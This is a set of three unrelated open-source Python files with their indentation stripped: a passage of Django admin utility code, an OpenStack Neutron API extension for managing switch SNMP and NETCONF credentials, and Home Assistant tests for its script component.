opts.app_label,
opts.model_name),
None, (quote(obj._get_pk_val()),))
except NoReverseMatch:
# Change url doesn't exist -- don't display link to edit
return no_edit_link
p = '%s.%s' % (opts.app_label,
get_permission_codename('delete', opts))
if not user.has_perm(p):
perms_needed.add(opts.verbose_name)
# Display a link to the admin page.
return format_html('{}: <a href="{}">{}</a>',
capfirst(opts.verbose_name),
admin_url,
obj)
else:
# Don't display link to edit, because it either has no
# admin or is edited inline.
return no_edit_link
to_delete = collector.nested(format_callback)
protected = [format_callback(obj) for obj in collector.protected]
return to_delete, collector.model_count, perms_needed, protected
class NestedObjects(Collector):
def __init__(self, *args, **kwargs):
super(NestedObjects, self).__init__(*args, **kwargs)
self.edges = {} # {from_instance: [to_instances]}
self.protected = set()
self.model_count = defaultdict(int)
def add_edge(self, source, target):
self.edges.setdefault(source, []).append(target)
def collect(self, objs, source=None, source_attr=None, **kwargs):
for obj in objs:
if source_attr and not source_attr.endswith('+'):
related_name = source_attr % {
'class': source._meta.model_name,
'app_label': source._meta.app_label,
}
self.add_edge(getattr(obj, related_name), obj)
else:
self.add_edge(None, obj)
self.model_count[obj._meta.verbose_name_plural] += 1
try:
return super(NestedObjects, self).collect(objs, source_attr=source_attr, **kwargs)
except models.ProtectedError as e:
self.protected.update(e.protected_objects)
def related_objects(self, related, objs):
qs = super(NestedObjects, self).related_objects(related, objs)
return qs.select_related(related.field.name)
def _nested(self, obj, seen, format_callback):
if obj in seen:
return []
seen.add(obj)
children = []
for child in self.edges.get(obj, ()):
children.extend(self._nested(child, seen, format_callback))
if format_callback:
ret = [format_callback(obj)]
else:
ret = [obj]
if children:
ret.append(children)
return ret
def nested(self, format_callback=None):
"""
Return the graph as a nested list.
"""
seen = set()
roots = []
for root in self.edges.get(None, ()):
roots.extend(self._nested(root, seen, format_callback))
return roots
def can_fast_delete(self, *args, **kwargs):
"""
We always want to load the objects into memory so that we can display
them to the user in confirm page.
"""
return False
def model_format_dict(obj):
"""
Return a `dict` with keys 'verbose_name' and 'verbose_name_plural',
typically for use with string formatting.
`obj` may be a `Model` instance, `Model` subclass, or `QuerySet` instance.
"""
if isinstance(obj, (models.Model, models.base.ModelBase)):
opts = obj._meta
elif isinstance(obj, models.query.QuerySet):
opts = obj.model._meta
else:
opts = obj
return {
'verbose_name': force_text(opts.verbose_name),
'verbose_name_plural': force_text(opts.verbose_name_plural)
}
def model_ngettext(obj, n=None):
"""
Return the appropriate `verbose_name` or `verbose_name_plural` value for
`obj` depending on the count `n`.
`obj` may be a `Model` instance, `Model` subclass, or `QuerySet` instance.
If `obj` is a `QuerySet` instance, `n` is optional and the length of the
`QuerySet` is used.
"""
if isinstance(obj, models.query.QuerySet):
if n is None:
n = obj.count()
obj = obj.model
d = model_format_dict(obj)
singular, plural = d["verbose_name"], d["verbose_name_plural"]
return ungettext(singular, plural, n or 0)
def lookup_field(name, obj, model_admin=None):
opts = obj._meta
try:
f = _get_non_gfk_field(opts, name)
except FieldDoesNotExist:
# For non-field values, the value is either a method, property or
# returned via a callable.
if callable(name):
attr = name
value = attr(obj)
elif (model_admin is not None and
hasattr(model_admin, name) and
not name == '__str__' and
not name == '__unicode__'):
attr = getattr(model_admin, name)
value = attr(obj)
else:
attr = getattr(obj, name)
if callable(attr):
value = attr()
else:
value = attr
f = None
else:
attr = None
value = getattr(obj, name)
return f, attr, value
def _get_non_gfk_field(opts, name):
"""
For historical reasons, the admin app relies on GenericForeignKeys as being
"not found" by get_field(). This could likely be cleaned up.
"""
field = opts.get_field(name)
if field.is_relation and field.many_to_one and not field.related_model:
raise FieldDoesNotExist()
return field
def label_for_field(name, model, model_admin=None, return_attr=False):
"""
Returns a sensible label for a field name. The name can be a callable,
property (but not created with @property decorator) or the name of an
object's attribute, as well as a genuine fields. If return_attr is
True, the resolved attribute (which could be a callable) is also returned.
This will be None if (and only if) the name refers to a field.
"""
attr = None
try:
field = _get_non_gfk_field(model._meta, name)
try:
label = field.verbose_name
except AttributeError:
# field is likely a ForeignObjectRel
label = field.related_model._meta.verbose_name
except FieldDoesNotExist:
if name == "__unicode__":
label = force_text(model._meta.verbose_name)
attr = six.text_type
elif name == "__str__":
label = force_str(model._meta.verbose_name)
attr = bytes
else:
if callable(name):
attr = name
elif model_admin is not None and hasattr(model_admin, name):
attr = getattr(model_admin, name)
elif hasattr(model, name):
attr = getattr(model, name)
else:
message = "Unable to lookup '%s' on %s" % (name, model._meta.object_name)
if model_admin:
message += " or %s" % (model_admin.__class__.__name__,)
raise AttributeError(message)
if hasattr(attr, "short_description"):
label = attr.short_description
elif (isinstance(attr, property) and
hasattr(attr, "fget") and
hasattr(attr.fget, "short_description")):
label = attr.fget.short_description
elif callable(attr):
if attr.__name__ == "<lambda>":
label = "--"
else:
label = pretty_name(attr.__name__)
else:
label = pretty_name(name)
if return_attr:
return (label, attr)
else:
return label
def help_text_for_field(name, model):
help_text = ""
try:
field = _get_non_gfk_field(model._meta, name)
except FieldDoesNotExist:
pass
else:
if hasattr(field, 'help_text'):
help_text = field.help_text
return smart_text(help_text)
def display_for_field(value, field, empty_value_display):
from django.contrib.admin.templatetags.admin_list import _boolean_icon
if field.flatchoices:
return dict(field.flatchoices).get(value, empty_value_display)
# NullBooleanField needs special-case null-handling, so it comes
# before the general null test.
elif isinstance(field, models.BooleanField) or isinstance(field, models.NullBooleanField):
return _boolean_icon(value)
elif value is None:
return empty_value_display
elif isinstance(field, models.DateTimeField):
return formats.localize(timezone.template_localtime(value))
elif isinstance(field, (models.DateField, models.TimeField)):
return formats.localize(value)
elif isinstance(field, models.DecimalField):
return formats.number_format(value, field.decimal_places)
elif isinstance(field, (models.IntegerField, models.FloatField)):
return formats.number_format(value)
elif isinstance(field, models.FileField) and value:
return format_html('<a href="{}">{}</a>', value.url, value)
else:
return smart_text(value)
def display_for_value(value, empty_value_display, boolean=False):
from django.contrib.admin.templatetags.admin_list import _boolean_icon
if boolean:
return _boolean_icon(value)
elif value is None:
return empty_value_display
elif isinstance(value, datetime.datetime):
return formats.localize(timezone.template_localtime(value))
elif isinstance(value, (datetime.date, datetime.time)):
return formats.localize(value)
elif isinstance(value, six.integer_types + (decimal.Decimal, float)):
return formats.number_format(value)
else:
return smart_text(value)
class NotRelationField(Exception):
pass
def get_model_from_relation(field):
if hasattr(field, 'get_path_info'):
return field.get_path_info()[-1].to_opts.model
else:
raise NotRelationField
def reverse_field_path(model, path):
""" Create a reversed field path.
E.g. Given (Order, "user__groups"),
return (Group, "user__order").
Final field must be a related model, not a data field.
"""
reversed_path = []
parent = model
pieces = path.split(LOOKUP_SEP)
for piece in pieces:
field = parent._meta.get_field(piece)
# skip trailing data field if extant:
if len(reversed_path) == len(pieces) - 1: # final iteration
try:
get_model_from_relation(field)
except NotRelationField:
break
# Field should point to another model
if field.is_relation and not (field.auto_created and not field.concrete):
related_name = field.related_query_name()
parent = field.remote_field.model
else:
related_name = field.field.name
parent = field.related_model
reversed_path.insert(0, related_name)
return (parent, LOOKUP_SEP.join(reversed_path))
def get_fields_from_path(model, path):
""" Return list of Fields given path relative to model.
e.g. (ModelX, "user__groups__name") -> [
<django.db.models.fields.related.ForeignKey object at 0x...>,
<django.db.models.fields.related.ManyToManyField object at 0x...>,
<django.db.models.fields.CharField object at 0x...>,
]
"""
pieces = path.split(LOOKUP_SEP)
fields = []
for piece in pieces:
if fields:
parent = get_model_from_relation(fields[-1])
else:
parent = model
fields.append(parent._meta.get_field(piece))
return fields
def remove_trailing_data_field(fields):
""" Discard trailing non-relation field if extant. """
try:
get_model_from_relation(fields[-1])
except NotRelationField:
fields = fields[:-1]
return fields
|
|
# Copyright (c) 2016 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import webob.exc
from neutron.api import extensions
from neutron.api.v2 import attributes
from neutron.api.v2 import base
from neutron.api.v2 import resource
from neutron import wsgi
from baremetal_network_provisioning.common import constants as const
from baremetal_network_provisioning.common import validators
from baremetal_network_provisioning.db import bm_nw_provision_db as db
from oslo_log import log as logging
from oslo_utils import uuidutils
LOG = logging.getLogger(__name__)
RESOURCE_ATTRIBUTE_MAP = {
'bnp-credentials': {
'id': {'allow_post': False, 'allow_put': False,
'is_visible': True},
'name': {'allow_post': True, 'allow_put': True,
'validate': {'type:string': None},
'is_visible': True},
'snmpv1': {'allow_post': True, 'allow_put': True,
'validate': {'type:access_dict': None},
'is_visible': True},
'snmpv2c': {'allow_post': True, 'allow_put': True,
'validate': {'type:access_dict': None},
'is_visible': True},
'snmpv3': {'allow_post': True, 'allow_put': True,
'validate': {'type:access_dict': None},
'is_visible': True},
'netconf_ssh': {'allow_post': True, 'allow_put': True,
'validate': {'type:access_dict': None},
'is_visible': True},
'netconf_soap': {'allow_post': True, 'allow_put': True,
'validate': {'type:access_dict': None},
'is_visible': True},
},
}
validator_func = validators.access_parameter_validator
attributes.validators['type:access_dict'] = validator_func
class BNPCredentialController(wsgi.Controller):
"""WSGI Controller for the extension bnp-credential."""
def _check_admin(self, context):
reason = _("Only admin can configure Bnp-credential")
if not context.is_admin:
raise webob.exc.HTTPForbidden(reason)
def index(self, request, **kwargs):
context = request.context
filters = {}
creds = []
req_dict = dict(request.GET)
if req_dict and req_dict.get('fields', None):
req_dict.pop('fields')
filters = req_dict
creds = db.get_all_snmp_creds(context, **filters)
netconf_creds = db.get_all_netconf_creds(context, **filters)
for i in netconf_creds:
creds.append(i)
creds = self._creds_to_show(creds)
creds_dict = {'bnp_credentials': creds}
return creds_dict
def _creds_to_show(self, creds):
attr_list = ['security_name', 'auth_protocol', 'auth_key',
'priv_protocol', 'priv_key', 'write_community',
'security_level', 'user_name', 'password', 'key_path']
creds_list = []
if isinstance(creds, list):
for cred in creds:
cred = dict(cred)
for key in attr_list:
if key in cred:
cred.pop(key)
creds_list.append(cred)
return creds_list
else:
cred = dict(creds)
for key in attr_list:
if key in cred:
cred.pop(key)
return cred
def show(self, request, id, **kwargs):
context = request.context
snmp_cred = db.get_snmp_cred_by_id(context, id)
netconf_cred = db.get_netconf_cred_by_id(context, id)
if snmp_cred:
cred = self._creds_to_show(snmp_cred)
elif netconf_cred:
cred = self._creds_to_show(netconf_cred)
else:
raise webob.exc.HTTPNotFound(
_("Credential with id=%s does not exist") % id)
return {const.BNP_CREDENTIAL_RESOURCE_NAME: cred}
def delete(self, request, id, **kwargs):
context = request.context
self._check_admin(context)
filters = {'credentials': id}
switch_exists = db.get_if_bnp_phy_switch_exists(context, **filters)
if switch_exists:
raise webob.exc.HTTPConflict(
_("credential with id=%s is associated with a switch."
"Hence can't be deleted.") % id)
snmp_cred = db.get_snmp_cred_by_id(context, id)
netconf_cred = db.get_netconf_cred_by_id(context, id)
if snmp_cred:
db.delete_snmp_cred_by_id(context, id)
elif netconf_cred:
db.delete_netconf_cred_by_id(context, id)
else:
raise webob.exc.HTTPNotFound(
_("Credential with id=%s does not exist") % id)
def create(self, request, **kwargs):
"""Create a new Credential."""
context = request.context
self._check_admin(context)
body = validators.validate_request(request)
key_list = ['name', 'snmpv1', 'snmpv2c',
'snmpv3', 'netconf_ssh', 'netconf_soap']
keys = body.keys()
validators.validate_attributes(keys, key_list)
protocol = validators.validate_access_parameters(body)
if protocol in ['snmpv1', 'snmpv2c', 'snmpv3']:
db_snmp_cred = self._create_snmp_creds(context, body, protocol)
db_snmp_cred = self._creds_to_show(db_snmp_cred)
return {const.BNP_CREDENTIAL_RESOURCE_NAME: dict(db_snmp_cred)}
else:
db_netconf_cred = self._create_netconf_creds(
context, body, protocol)
db_netconf_cred = self._creds_to_show(db_netconf_cred)
return {const.BNP_CREDENTIAL_RESOURCE_NAME: dict(db_netconf_cred)}
def _create_snmp_creds(self, context, body, protocol):
"""Create a new SNMP Credential."""
access_parameters = body.pop(protocol)
snmp_cred_dict = self._create_snmp_cred_dict()
for key, value in access_parameters.iteritems():
body[key] = value
body['protocol_type'] = protocol
snmp_cred = self._update_dict(body, snmp_cred_dict)
db_snmp_cred = db.add_bnp_snmp_cred(context, snmp_cred)
return db_snmp_cred
def _create_netconf_creds(self, context, body, protocol):
"""Create a new NETCONF Credential."""
access_parameters = body.pop(protocol)
netconf_cred_dict = self._create_netconf_cred_dict()
for key, value in access_parameters.iteritems():
body[key] = value
body['protocol_type'] = protocol
netconf_cred = self._update_dict(body, netconf_cred_dict)
db_netconf_cred = db.add_bnp_netconf_cred(context, netconf_cred)
return db_netconf_cred
def _create_snmp_cred_dict(self):
"""Create SNMP credential dict."""
snmp_cred_dict = {
'name': None,
'protocol_type': None,
'security_name': None,
'write_community': None,
'auth_protocol': None,
'auth_key': None,
'priv_protocol': None,
'priv_key': None,
'security_level': None}
return snmp_cred_dict
def _create_netconf_cred_dict(self):
"""Create NETCONF credential dict."""
netconf_cred_dict = {
'name': None,
'protocol_type': None,
'user_name': None,
'password': None,
'key_path': None}
return netconf_cred_dict
def check_creds_proto_type(self, switch_creds, id, protocol):
if not switch_creds or (switch_creds.get('protocol_type')
!= protocol.lower()):
raise webob.exc.HTTPBadRequest(
_("protocol type cannot be updated for the id %s") % id)
def _update_dict(self, body, cred_dict):
"""Update the existing dict."""
for key in cred_dict.keys():
if key in body.keys():
cred_dict[key] = body[key]
return cred_dict
def update(self, request, id, **kwargs):
context = request.context
self._check_admin(context)
body = validators.validate_request(request)
protocol = validators.validate_access_parameters_for_update(body)
key_list = ['name', 'snmpv1', 'snmpv2c',
'snmpv3', 'netconf_ssh', 'netconf_soap']
keys = body.keys()
validators.validate_attributes(keys, key_list)
if not uuidutils.is_uuid_like(id):
raise webob.exc.HTTPBadRequest(
_("Invalid Id"))
if not protocol:
switch_creds = db.get_snmp_cred_by_id(context, id)
if switch_creds:
switch_creds_dict = self._update_dict(body, dict(switch_creds))
db.update_bnp_snmp_cred_by_id(context, id, switch_creds_dict)
return switch_creds_dict
switch_creds = db.get_netconf_cred_by_id(context, id)
if switch_creds:
switch_creds_dict = self._update_dict(body, dict(switch_creds))
db.update_bnp_netconf_cred_by_id(
context, id, switch_creds_dict)
return switch_creds_dict
raise webob.exc.HTTPNotFound(
_("Credential with id=%s does not exist") % id)
elif protocol in [const.SNMP_V1, const.SNMP_V2C]:
switch_creds = db.get_snmp_cred_by_id(context, id)
if not switch_creds:
raise webob.exc.HTTPNotFound(
_("Credential with id=%s does not exist") % id)
self.check_creds_proto_type(switch_creds, id, protocol)
params = body.pop(protocol)
for key, value in params.iteritems():
body[key] = value
creds_dict = self._update_dict(body, dict(switch_creds))
db.update_bnp_snmp_cred_by_id(context, id, creds_dict)
return creds_dict
elif protocol == const.SNMP_V3:
switch_creds = db.get_snmp_cred_by_id(context, id)
if not switch_creds:
raise webob.exc.HTTPNotFound(
_("Credential with id=%s does not exist") % id)
self.check_creds_proto_type(switch_creds, id, protocol)
params = body.pop(protocol)
if ('auth_protocol' in params.keys()) ^ (
'auth_key' in params.keys()):
if (not switch_creds['auth_protocol']) and (
not switch_creds['auth_key']):
raise webob.exc.HTTPBadRequest(
_("auth_protocol and auth_key values does not exist,"
" so both has to be provided"))
if ('priv_protocol' in params.keys()) ^ ('priv_key'
in params.keys()):
if (not switch_creds['priv_protocol']) and (
not switch_creds['priv_key']):
raise webob.exc.HTTPBadRequest(
_("priv_protocol and priv_key values does not exist,"
" so both has to be provided"))
for key, value in params.iteritems():
body[key] = value
creds_dict = self._update_dict(body, dict(switch_creds))
db.update_bnp_snmp_cred_by_id(context, id, creds_dict)
return creds_dict
elif protocol == const.NETCONF_SOAP:
switch_creds = db.get_netconf_cred_by_id(context, id)
if not switch_creds:
raise webob.exc.HTTPNotFound(
_("Credential with id=%s does not exist") % id)
self.check_creds_proto_type(switch_creds, id, protocol)
params = body.pop(protocol)
for key, value in params.iteritems():
body[key] = value
creds_dict = self._update_dict(body, dict(switch_creds))
db.update_bnp_netconf_cred_by_id(context, id, creds_dict)
return creds_dict
elif protocol == const.NETCONF_SSH:
switch_creds = db.get_netconf_cred_by_id(context, id)
if not switch_creds:
raise webob.exc.HTTPNotFound(
_("Credential with id=%s does not exist") % id)
self.check_creds_proto_type(switch_creds, id, protocol)
params = body.pop(protocol)
if ('user_name' in params.keys()) ^ ('password' in params.keys()):
if (not switch_creds['user_name']) and (
not switch_creds['password']):
raise webob.exc.HTTPBadRequest(
_("user_name and password values does not exist, so"
" both has to be provided"))
for key, value in params.iteritems():
body[key] = value
creds_dict = self._update_dict(body, dict(switch_creds))
db.update_bnp_netconf_cred_by_id(context, id, creds_dict)
return creds_dict
class Bnp_credential(extensions.ExtensionDescriptor):
"""API extension for Baremetal Switch Credential support."""
@classmethod
def get_name(cls):
return "Bnp-Credential"
@classmethod
def get_alias(cls):
return "bnp-credential"
@classmethod
def get_description(cls):
return ("Abstraction for protocol credentials"
" for bare metal instance network provisioning")
@classmethod
def get_updated(cls):
return "2016-03-22T00:00:00-00:00"
def get_resources(self):
exts = []
controller = resource.Resource(BNPCredentialController(),
base.FAULT_MAP)
exts.append(extensions.ResourceExtension(
'bnp-credentials', controller))
return exts
def get_extended_resources(self, version):
if version == "2.0":
return RESOURCE_ATTRIBUTE_MAP
else:
return {}
|
|
"""The tests for the Script component."""
# pylint: disable=protected-access
import asyncio
import unittest
import pytest
from homeassistant.components import logbook, script
from homeassistant.components.script import DOMAIN, EVENT_SCRIPT_STARTED
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_NAME,
SERVICE_RELOAD,
SERVICE_TOGGLE,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
)
from homeassistant.core import Context, callback, split_entity_id
from homeassistant.exceptions import ServiceNotFound
from homeassistant.helpers.service import async_get_all_descriptions
from homeassistant.loader import bind_hass
from homeassistant.setup import async_setup_component, setup_component
from tests.async_mock import Mock, patch
from tests.common import get_test_home_assistant
from tests.components.logbook.test_init import MockLazyEventPartialState
ENTITY_ID = "script.test"
@bind_hass
def turn_on(hass, entity_id, variables=None, context=None):
"""Turn script on.
This is a legacy helper method. Do not use it for new tests.
"""
_, object_id = split_entity_id(entity_id)
hass.services.call(DOMAIN, object_id, variables, context=context)
@bind_hass
def turn_off(hass, entity_id):
"""Turn script on.
This is a legacy helper method. Do not use it for new tests.
"""
hass.services.call(DOMAIN, SERVICE_TURN_OFF, {ATTR_ENTITY_ID: entity_id})
@bind_hass
def toggle(hass, entity_id):
"""Toggle the script.
This is a legacy helper method. Do not use it for new tests.
"""
hass.services.call(DOMAIN, SERVICE_TOGGLE, {ATTR_ENTITY_ID: entity_id})
@bind_hass
def reload(hass):
"""Reload script component.
This is a legacy helper method. Do not use it for new tests.
"""
hass.services.call(DOMAIN, SERVICE_RELOAD)
class TestScriptComponent(unittest.TestCase):
"""Test the Script component."""
# pylint: disable=invalid-name
def setUp(self):
"""Set up things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.addCleanup(self.tear_down_cleanup)
def tear_down_cleanup(self):
"""Stop down everything that was started."""
self.hass.stop()
def test_turn_on_service(self):
"""Verify that the turn_on service."""
event = "test_event"
events = []
@callback
def record_event(event):
"""Add recorded event to set."""
events.append(event)
self.hass.bus.listen(event, record_event)
assert setup_component(
self.hass,
"script",
{
"script": {
"test": {"sequence": [{"delay": {"seconds": 5}}, {"event": event}]}
}
},
)
turn_on(self.hass, ENTITY_ID)
self.hass.block_till_done()
assert script.is_on(self.hass, ENTITY_ID)
assert 0 == len(events)
# Calling turn_on a second time should not advance the script
turn_on(self.hass, ENTITY_ID)
self.hass.block_till_done()
assert 0 == len(events)
turn_off(self.hass, ENTITY_ID)
self.hass.block_till_done()
assert not script.is_on(self.hass, ENTITY_ID)
assert 0 == len(events)
def test_toggle_service(self):
"""Test the toggling of a service."""
event = "test_event"
events = []
@callback
def record_event(event):
"""Add recorded event to set."""
events.append(event)
self.hass.bus.listen(event, record_event)
assert setup_component(
self.hass,
"script",
{
"script": {
"test": {"sequence": [{"delay": {"seconds": 5}}, {"event": event}]}
}
},
)
toggle(self.hass, ENTITY_ID)
self.hass.block_till_done()
assert script.is_on(self.hass, ENTITY_ID)
assert 0 == len(events)
toggle(self.hass, ENTITY_ID)
self.hass.block_till_done()
assert not script.is_on(self.hass, ENTITY_ID)
assert 0 == len(events)
def test_passing_variables(self):
"""Test different ways of passing in variables."""
calls = []
context = Context()
@callback
def record_call(service):
"""Add recorded event to set."""
calls.append(service)
self.hass.services.register("test", "script", record_call)
assert setup_component(
self.hass,
"script",
{
"script": {
"test": {
"sequence": {
"service": "test.script",
"data_template": {"hello": "{{ greeting }}"},
}
}
}
},
)
turn_on(self.hass, ENTITY_ID, {"greeting": "world"}, context=context)
self.hass.block_till_done()
assert len(calls) == 1
assert calls[0].context is context
assert calls[0].data["hello"] == "world"
self.hass.services.call(
"script", "test", {"greeting": "universe"}, context=context
)
self.hass.block_till_done()
assert len(calls) == 2
assert calls[1].context is context
assert calls[1].data["hello"] == "universe"
invalid_configs = [
{"test": {}},
{"test hello world": {"sequence": [{"event": "bla"}]}},
{"test": {"sequence": {"event": "test_event", "service": "homeassistant.turn_on"}}},
{"test": {"sequence": [], "mode": "parallel", "queue_size": 5}},
]
@pytest.mark.parametrize("value", invalid_configs)
async def test_setup_with_invalid_configs(hass, value):
"""Test setup with invalid configs."""
assert not await async_setup_component(
hass, "script", {"script": value}
), f"Script loaded with wrong config {value}"
assert 0 == len(hass.states.async_entity_ids("script"))
@pytest.mark.parametrize("running", ["no", "same", "different"])
async def test_reload_service(hass, running):
"""Verify the reload service."""
assert await async_setup_component(
hass, "script", {"script": {"test": {"sequence": [{"delay": {"seconds": 5}}]}}}
)
assert hass.states.get(ENTITY_ID) is not None
assert hass.services.has_service(script.DOMAIN, "test")
if running != "no":
_, object_id = split_entity_id(ENTITY_ID)
await hass.services.async_call(DOMAIN, object_id)
await hass.async_block_till_done()
assert script.is_on(hass, ENTITY_ID)
object_id = "test" if running == "same" else "test2"
with patch(
"homeassistant.config.load_yaml_config_file",
return_value={"script": {object_id: {"sequence": [{"delay": {"seconds": 5}}]}}},
):
await hass.services.async_call(DOMAIN, SERVICE_RELOAD, blocking=True)
await hass.async_block_till_done()
if running != "same":
assert hass.states.get(ENTITY_ID) is None
assert not hass.services.has_service(script.DOMAIN, "test")
assert hass.states.get("script.test2") is not None
assert hass.services.has_service(script.DOMAIN, "test2")
else:
assert hass.states.get(ENTITY_ID) is not None
assert hass.services.has_service(script.DOMAIN, "test")
async def test_service_descriptions(hass):
"""Test that service descriptions are loaded and reloaded correctly."""
# Test 1: has "description" but no "fields"
assert await async_setup_component(
hass,
"script",
{
"script": {
"test": {
"description": "test description",
"sequence": [{"delay": {"seconds": 5}}],
}
}
},
)
descriptions = await async_get_all_descriptions(hass)
assert descriptions[DOMAIN]["test"]["description"] == "test description"
assert not descriptions[DOMAIN]["test"]["fields"]
# Test 2: has "fields" but no "description"
with patch(
"homeassistant.config.load_yaml_config_file",
return_value={
"script": {
"test": {
"fields": {
"test_param": {
"description": "test_param description",
"example": "test_param example",
}
},
"sequence": [{"delay": {"seconds": 5}}],
}
}
},
):
await hass.services.async_call(DOMAIN, SERVICE_RELOAD, blocking=True)
descriptions = await async_get_all_descriptions(hass)
assert descriptions[script.DOMAIN]["test"]["description"] == ""
assert (
descriptions[script.DOMAIN]["test"]["fields"]["test_param"]["description"]
== "test_param description"
)
assert (
descriptions[script.DOMAIN]["test"]["fields"]["test_param"]["example"]
== "test_param example"
)
async def test_shared_context(hass):
"""Test that the shared context is passed down the chain."""
event = "test_event"
context = Context()
event_mock = Mock()
run_mock = Mock()
hass.bus.async_listen(event, event_mock)
hass.bus.async_listen(EVENT_SCRIPT_STARTED, run_mock)
assert await async_setup_component(
hass, "script", {"script": {"test": {"sequence": [{"event": event}]}}}
)
await hass.services.async_call(
DOMAIN, SERVICE_TURN_ON, {ATTR_ENTITY_ID: ENTITY_ID}, context=context
)
await hass.async_block_till_done()
assert event_mock.call_count == 1
assert run_mock.call_count == 1
args, kwargs = run_mock.call_args
assert args[0].context == context
# Ensure event data has all attributes set
assert args[0].data.get(ATTR_NAME) == "test"
assert args[0].data.get(ATTR_ENTITY_ID) == "script.test"
# Ensure context carries through the event
args, kwargs = event_mock.call_args
assert args[0].context == context
# Ensure the script state shares the same context
state = hass.states.get("script.test")
assert state is not None
assert state.context == context
async def test_logging_script_error(hass, caplog):
"""Test logging script error."""
assert await async_setup_component(
hass,
"script",
{"script": {"hello": {"sequence": [{"service": "non.existing"}]}}},
)
with pytest.raises(ServiceNotFound) as err:
await hass.services.async_call("script", "hello", blocking=True)
assert err.value.domain == "non"
assert err.value.service == "existing"
assert "Error executing script" in caplog.text
async def test_turning_no_scripts_off(hass):
"""Test it is possible to turn two scripts off."""
assert await async_setup_component(hass, "script", {})
# Testing it doesn't raise
await hass.services.async_call(
DOMAIN, SERVICE_TURN_OFF, {"entity_id": []}, blocking=True
)
async def test_async_get_descriptions_script(hass):
"""Test async_set_service_schema for the script integration."""
script_config = {
DOMAIN: {
"test1": {"sequence": [{"service": "homeassistant.restart"}]},
"test2": {
"description": "test2",
"fields": {
"param": {
"description": "param_description",
"example": "param_example",
}
},
"sequence": [{"service": "homeassistant.restart"}],
},
}
}
await async_setup_component(hass, DOMAIN, script_config)
descriptions = await hass.helpers.service.async_get_all_descriptions()
assert descriptions[DOMAIN]["test1"]["description"] == ""
assert not descriptions[DOMAIN]["test1"]["fields"]
assert descriptions[DOMAIN]["test2"]["description"] == "test2"
assert (
descriptions[DOMAIN]["test2"]["fields"]["param"]["description"]
== "param_description"
)
assert (
descriptions[DOMAIN]["test2"]["fields"]["param"]["example"] == "param_example"
)
async def test_extraction_functions(hass):
"""Test extraction functions."""
assert await async_setup_component(
hass,
DOMAIN,
{
DOMAIN: {
"test1": {
"sequence": [
{
"service": "test.script",
"data": {"entity_id": "light.in_both"},
},
{
"service": "test.script",
"data": {"entity_id": "light.in_first"},
},
{"domain": "light", "device_id": "device-in-both"},
]
},
"test2": {
"sequence": [
{
"service": "test.script",
"data": {"entity_id": "light.in_both"},
},
{
"condition": "state",
"entity_id": "sensor.condition",
"state": "100",
},
{"scene": "scene.hello"},
{"domain": "light", "device_id": "device-in-both"},
{"domain": "light", "device_id": "device-in-last"},
],
},
}
},
)
assert set(script.scripts_with_entity(hass, "light.in_both")) == {
"script.test1",
"script.test2",
}
assert set(script.entities_in_script(hass, "script.test1")) == {
"light.in_both",
"light.in_first",
}
assert set(script.scripts_with_device(hass, "device-in-both")) == {
"script.test1",
"script.test2",
}
assert set(script.devices_in_script(hass, "script.test2")) == {
"device-in-both",
"device-in-last",
}
async def test_config_basic(hass):
"""Test passing info in config."""
assert await async_setup_component(
hass,
"script",
{
"script": {
"test_script": {
"alias": "Script Name",
"icon": "mdi:party",
"sequence": [],
}
}
},
)
test_script = hass.states.get("script.test_script")
assert test_script.name == "Script Name"
assert test_script.attributes["icon"] == "mdi:party"
async def test_config_legacy(hass, caplog):
"""Test config defaulting to legacy mode."""
assert await async_setup_component(
hass, "script", {"script": {"test_script": {"sequence": []}}}
)
assert "To continue using previous behavior, which is now deprecated" in caplog.text
async def test_logbook_humanify_script_started_event(hass):
"""Test humanifying script started event."""
hass.config.components.add("recorder")
await async_setup_component(hass, DOMAIN, {})
await async_setup_component(hass, "logbook", {})
entity_attr_cache = logbook.EntityAttributeCache(hass)
event1, event2 = list(
logbook.humanify(
hass,
[
MockLazyEventPartialState(
EVENT_SCRIPT_STARTED,
{ATTR_ENTITY_ID: "script.hello", ATTR_NAME: "Hello Script"},
),
MockLazyEventPartialState(
EVENT_SCRIPT_STARTED,
{ATTR_ENTITY_ID: "script.bye", ATTR_NAME: "Bye Script"},
),
],
entity_attr_cache,
)
)
assert event1["name"] == "Hello Script"
assert event1["domain"] == "script"
assert event1["message"] == "started"
assert event1["entity_id"] == "script.hello"
assert event2["name"] == "Bye Script"
assert event2["domain"] == "script"
assert event2["message"] == "started"
assert event2["entity_id"] == "script.bye"
@pytest.mark.parametrize("concurrently", [False, True])
async def test_concurrent_script(hass, concurrently):
"""Test calling script concurrently or not."""
if concurrently:
call_script_2 = {
"service": "script.turn_on",
"data": {"entity_id": "script.script2"},
}
else:
call_script_2 = {"service": "script.script2"}
assert await async_setup_component(
hass,
"script",
{
"script": {
"script1": {
"mode": "parallel",
"sequence": [
call_script_2,
{
"wait_template": "{{ is_state('input_boolean.test1', 'on') }}"
},
{"service": "test.script", "data": {"value": "script1"}},
],
},
"script2": {
"mode": "parallel",
"sequence": [
{"service": "test.script", "data": {"value": "script2a"}},
{
"wait_template": "{{ is_state('input_boolean.test2', 'on') }}"
},
{"service": "test.script", "data": {"value": "script2b"}},
],
},
}
},
)
service_called = asyncio.Event()
service_values = []
async def async_service_handler(service):
nonlocal service_values
service_values.append(service.data.get("value"))
service_called.set()
hass.services.async_register("test", "script", async_service_handler)
hass.states.async_set("input_boolean.test1", "off")
hass.states.async_set("input_boolean.test2", "off")
await hass.services.async_call("script", "script1")
await asyncio.wait_for(service_called.wait(), 1)
service_called.clear()
assert "script2a" == service_values[-1]
assert script.is_on(hass, "script.script1")
assert script.is_on(hass, "script.script2")
if not concurrently:
hass.states.async_set("input_boolean.test2", "on")
await asyncio.wait_for(service_called.wait(), 1)
service_called.clear()
assert "script2b" == service_values[-1]
hass.states.async_set("input_boolean.test1", "on")
await asyncio.wait_for(service_called.wait(), 1)
service_called.clear()
assert "script1" == service_values[-1]
